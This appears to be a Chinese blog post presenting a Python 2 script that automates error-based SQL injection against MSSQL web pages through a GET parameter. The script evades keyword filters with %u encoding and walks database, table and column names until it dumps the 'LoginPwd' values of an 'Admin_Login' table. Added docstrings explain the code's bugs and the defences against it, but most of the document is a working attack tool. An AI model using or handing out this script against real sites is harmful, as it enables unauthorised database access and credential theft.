基于mssql的报错注入的脚本(get)
在进行mssql注入的时候,由于各种各样的原因,我们不能使用工具进行值的获取,那么可以自行编写脚本来获取值。python由于其良好的抓取网页的功能,被大家广泛使用。
对于get型的mssql的报错注入,代码如下:
#! /usr/bin/
env python
#coding=utf-8
import re
import urllib
import urllib2
# Fetch the page for one injected expression and hand back the raw HTML so the
# database error text embedded in it can be parsed by getdata().
def getcontent(payload):  # fetch page content
    """Append ``AND (<payload>)=1 --- `` to the module-global ``url`` and return the body.

    The complete response is also printed as a side effect. ``url`` is not a
    parameter: it is only assigned inside the ``__main__`` block, so calling this
    function from an importing module raises NameError. Python 2 only
    (``urllib.urlopen``, ``print`` statement).

    From the defending side this request shape is easy to pick out of web-server
    logs: the ``id`` value is followed by ``AND (`` and a trailing ``---`` comment
    marker, and the application only leaks anything because it echoes raw
    database errors to the client.
    """
    url1 = url + "AND (" + payload + ")=1 --- "
    content = urllib.urlopen(url1).read()
    print content
    return content
# Pull the leaked value out of the database error text echoed in the page.
def getdata(content):
    """Return the first value quoted in an MSSQL conversion-error message, or None.

    The pattern matches the ``nvarchar ... 'value' ... int`` shape, presumably the
    "Conversion failed when converting the nvarchar value '...' to data type int"
    error. Only the first match is used. The regex is recompiled on every call;
    ``re`` caches it internally, so this is a style nit rather than a cost.

    This works only while the application returns detailed database errors to the
    browser. Serving a generic error page (and, at the root, never interpolating
    user input into SQL) makes this function return None for every request.
    """
    patt = re.compile("nvarchar.*?'(.*?)'.*?int")
    data = patt.findall(content)
    if data:
        return data[0]
    else:
        return None
# Name of the database the injected statement executes in.
def getcurrentdb():
    """Return the current database name obtained via ``db_name()``.

    Prints ``current_db: <name>`` before returning. If getdata() finds no error
    text the string concatenation raises TypeError (``str + None``), so the script
    stops here instead of carrying on with an empty name; there is no handling for
    that case.
    """
    payload = 'db_name()'
    content = getcontent(payload)
    data = getdata(content)
    print "current_db: "+data
    return data
def gettablename(dbname,n):  # table names
    """Print up to ``n`` user-table names read from ``<dbname>.dbo.sysobjects``.

    Request ``i`` injects ``select top 1 name ... not in (select top i name ...)``
    ordered by name, so each iteration is expected to yield the next table; the
    loop stops at the first value already seen (including a repeated None).
    Nothing is returned - the collected list is only printed.

    ``%u0066rom`` is ``from`` with its first letter written as a ``%u`` escape,
    a spelling chosen to slip past keyword filters; IIS-hosted applications
    presumably decode it back to the plain keyword. A WAF or log rule that
    normalises ``%u`` encoding before keyword matching sees ordinary ``from``.
    ``dbname`` is concatenated into the query unquoted. The bare ``except``
    swallows every exception, KeyboardInterrupt included, so a failing request
    is silently skipped.
    """
    tablelist1=[]
    for i in range(n):
        payload = "select top 1 name %u0066rom "+dbname+".dbo.sysobjects where xtype='U' and name not in(select top "+str(i)+" name %u0066rom "+dbname+".dbo.sysobjects where xtype='U' order by name) order by name"
        try:
            content = getcontent(payload)
            data = getdata(content)
            #print data
            if data not in tablelist1:
                tablelist1.append(data)
            else:
                break  # first repeat (or repeated None) ends the walk
        except:
            continue
    print tablelist1
    print '--------------------'
def getcolumns(dbname,table,n):  # column names
    """Print up to ``n`` column names of ``table`` from ``<dbname>.dbo.SysColumns``.

    Same walk as gettablename(): request ``i`` excludes the first ``i`` names
    (ordered by name) and takes the next one; the loop stops at the first repeated
    result. ``table`` is placed inside single quotes in the ``Object_Id('...')``
    call and ``dbname`` is concatenated unquoted; neither is escaped. Prints the
    table name, the list, and a separator; returns nothing. The bare ``except``
    hides every error from a failed request, so gaps in the output are possible.
    """
    tablelist2=[]
    for i in range(n):
        payload="Select top 1 name %u0066rom "+dbname+".dbo.SysColumns Where id=Object_Id('"+table+"') and name not in (Select top "+str(i)+" Name %u0066rom "+dbname+".dbo.SysColumns Where id=Object_Id('"+table+"') order by name) order by name"
        try:
            content = getcontent(payload)
            data = getdata(content)
            if data not in tablelist2:
                tablelist2.append(data)
            else:
                break
        except:
            continue
    print table
    print tablelist2
    print '--------------------'
def getvalue(dbname,table,column,n):  # values of one column
    """Print up to ``n`` values of ``column`` in ``table``.

    Request ``i`` excludes the first ``i`` values (``order by id``) and takes the
    next, so the table is assumed to have an ``id`` column. Unlike the two walkers
    above, ``dbname`` is accepted but never used - ``table`` is referenced without
    a database prefix. Stops at the first repeated result, prints the column name
    and the list, returns nothing. The bare ``except`` silently skips any request
    that fails.

    The value that leaks here is whatever the conversion error quotes, which is
    why credential columns stored in plaintext are the usual casualty; hashing
    stored secrets limits what an error-based leak can expose, and parameterised
    queries remove the leak entirely.
    """
    tablelist3=[]
    for i in range(n):
        payload="select top 1 "+column+" %u0066rom "+table+" where "+column+" not in(select top "+str(i)+" "+column+" %u0066rom "+table+" order by id)order by id"
        try:
            content = getcontent(payload)
            data = getdata(content)
            if data not in tablelist3:
                tablelist3.append(data)
            else:
                break
        except:
            continue
    print column
    print tablelist3
if __name__ == "__main__":
    # Base request the expressions are appended to; the host is the author's
    # placeholder, not a real target. getcontent() reads this module global.
    url="http://www.example/pages/BulletinPage.aspx?id=21"
    # Redundant at module level (a name here is already global); placing it after
    # the assignment is what Python 2 warns about and newer Pythons reject.
    global url
    db=getcurrentdb()
    gettablename('saa',200)  # passes the literal 'saa' rather than the ``db`` obtained above
    getcolumns(db,'Admin_Login',50)
    getvalue(db,'Admin_Login','LoginPwd',50)  # comment out the calls you do not need and keep only the one whose values you want